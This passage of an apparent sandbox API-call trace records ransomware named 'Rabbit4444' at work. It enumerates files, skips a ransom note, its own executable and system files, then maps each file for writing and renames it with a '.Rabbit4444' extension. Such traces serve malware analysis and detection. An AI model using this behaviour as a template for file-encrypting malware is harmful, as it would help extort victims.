Size=0x6c) returned 0x1177e8 [0058.197] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0058.197] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x720, lpName=0x0) returned 0x298 [0058.198] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x720) returned 0x70000 [0058.199] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.199] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0058.199] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.199] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0058.199] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0058.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0058.200] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14951041435) returned 1 [0058.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0058.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0058.200] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.200] CloseHandle (hObject=0x298) returned 1 [0058.200] CloseHandle (hObject=0x278) returned 1 [0058.200] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms.Rabbit4444") returned 192 [0058.200] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{030c20f0-e20b-417a-b7ad-cec6ee955cd3}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{030c20f0-e20b-417a-b7ad-cec6ee955cd3}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.201] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fffda00, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3fffda00, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x22250fbc, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms", cAlternateFileName="CL947F~1.SET")) returned 1 [0058.201] lstrcmpiW (lpString1="Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.201] lstrcmpiW (lpString1="Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.201] lstrcmpiW (lpString1="Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.201] lstrcmpiW (lpString1="Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms", lpString2=".") returned 1 [0058.201] lstrcmpiW (lpString1="Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms", lpString2="..") returned 1 [0058.201] lstrcmpiW (lpString1="Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms", lpString2="windows") returned -1 [0058.201] lstrcmpiW (lpString1="Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.201] lstrcmpiW (lpString1="Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.201] lstrcmpiW (lpString1="Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms", lpString2="boot") returned 1 [0058.201] lstrcmpiW (lpString1="Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.201] lstrcmpiW (lpString1="Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.201] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms" | out: lpString1="Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms") returned="Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms" [0058.201] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.201] lstrlenW (lpString="Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms") returned 64 [0058.201] lstrlenW (lpString="Rabbit4444") returned 10 [0058.201] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.201] lstrlenW (lpString=".dll") returned 4 [0058.202] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.202] lstrlenW (lpString=".lnk") returned 4 [0058.202] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.202] lstrlenW (lpString=".ini") returned 4 [0058.202] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.202] lstrlenW (lpString=".sys") returned 4 [0058.202] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.202] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{059ece57-19d1-4112-b05c-86f8ed5da6b0}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.202] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.202] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14951278121) returned 1 [0058.202] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=948) returned 1 [0058.202] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0058.202] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1018d0 [0058.202] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c0, lpName=0x0) returned 0x298 [0058.203] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c0) returned 0x70000 [0058.204] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.204] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0058.204] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.204] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0058.204] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.205] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0058.205] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.205] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0058.205] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14951557699) returned 1 [0058.205] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0058.205] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1018d0 | out: hHeap=0xe0000) returned 1 [0058.205] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.205] CloseHandle (hObject=0x298) returned 1 [0058.205] CloseHandle (hObject=0x278) returned 1 [0058.205] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms.Rabbit4444") returned 192 [0058.205] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{059ece57-19d1-4112-b05c-86f8ed5da6b0}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{059ece57-19d1-4112-b05c-86f8ed5da6b0}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.206] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40154edc, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x40154edc, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231f666f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x46f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms", cAlternateFileName="CL1F68~1.SET")) returned 1 [0058.206] lstrcmpiW (lpString1="Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.206] lstrcmpiW (lpString1="Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.206] lstrcmpiW (lpString1="Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.206] lstrcmpiW (lpString1="Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms", lpString2=".") returned 1 [0058.206] lstrcmpiW (lpString1="Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms", lpString2="..") returned 1 [0058.206] lstrcmpiW (lpString1="Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms", lpString2="windows") returned -1 [0058.206] lstrcmpiW (lpString1="Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.206] lstrcmpiW (lpString1="Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.206] lstrcmpiW (lpString1="Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms", lpString2="boot") returned 1 [0058.207] lstrcmpiW (lpString1="Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.207] lstrcmpiW (lpString1="Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.207] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms" | out: lpString1="Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms") returned="Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms" [0058.207] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.207] lstrlenW (lpString="Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms") returned 64 [0058.207] lstrlenW (lpString="Rabbit4444") returned 10 [0058.207] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.207] lstrlenW (lpString=".dll") returned 4 [0058.207] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.207] lstrlenW (lpString=".lnk") returned 4 [0058.207] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.207] lstrlenW (lpString=".ini") returned 4 [0058.207] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.207] lstrlenW (lpString=".sys") returned 4 [0058.207] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.207] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{06628900-13dd-4fc3-a18b-0e9ce7b663ed}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.207] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.207] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14951820492) returned 1 [0058.207] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1135) returned 1 [0058.208] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0058.208] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0058.208] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x770, lpName=0x0) returned 0x298 [0058.212] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x770) returned 0x70000 [0058.212] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.213] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0058.213] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.213] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0058.213] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.213] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0058.213] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.213] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0058.213] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14952372807) returned 1 [0058.213] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0058.213] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0058.213] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.213] CloseHandle (hObject=0x298) returned 1 [0058.213] CloseHandle (hObject=0x278) returned 1 [0058.213] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms.Rabbit4444") returned 192 [0058.213] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{06628900-13dd-4fc3-a18b-0e9ce7b663ed}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{06628900-13dd-4fc3-a18b-0e9ce7b663ed}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.214] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x401ed83e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x401ed83e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x224ffa05, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3fb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms", cAlternateFileName="CLCEC1~1.SET")) returned 1 [0058.214] lstrcmpiW (lpString1="Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.214] lstrcmpiW (lpString1="Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.214] lstrcmpiW (lpString1="Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.214] lstrcmpiW (lpString1="Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms", lpString2=".") returned 1 [0058.214] lstrcmpiW (lpString1="Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms", lpString2="..") returned 1 [0058.214] lstrcmpiW (lpString1="Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms", lpString2="windows") returned -1 [0058.215] lstrcmpiW (lpString1="Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.215] lstrcmpiW (lpString1="Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.215] lstrcmpiW (lpString1="Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms", lpString2="boot") returned 1 [0058.215] lstrcmpiW (lpString1="Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.215] lstrcmpiW (lpString1="Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.215] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms" | out: lpString1="Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms") returned="Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms" [0058.215] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.215] lstrlenW (lpString="Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms") returned 64 [0058.215] lstrlenW (lpString="Rabbit4444") returned 10 [0058.216] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.216] lstrlenW (lpString=".dll") returned 4 [0058.216] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.216] lstrlenW (lpString=".lnk") returned 4 [0058.216] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.216] lstrlenW (lpString=".ini") returned 4 [0058.216] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.216] lstrlenW (lpString=".sys") returned 4 [0058.216] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.216] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{06d12455-f35d-44d6-8e00-3f6a360cc030}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.216] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.216] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14952682876) returned 1 [0058.216] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1019) returned 1 [0058.216] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0058.216] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0058.216] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x298 [0058.217] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x70000 [0058.218] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.218] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.218] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.218] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0058.218] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.219] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0058.219] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.219] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.219] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14952937667) returned 1 [0058.219] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0058.219] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0058.219] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.219] CloseHandle (hObject=0x298) returned 1 [0058.219] CloseHandle (hObject=0x278) returned 1 [0058.219] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms.Rabbit4444") returned 192 [0058.219] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{06d12455-f35d-44d6-8e00-3f6a360cc030}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{06d12455-f35d-44d6-8e00-3f6a360cc030}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.220] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40344d01, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x40344d01, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2315dd0d, ftLastWriteTime.dwHighDateTime=0x1d112e3, 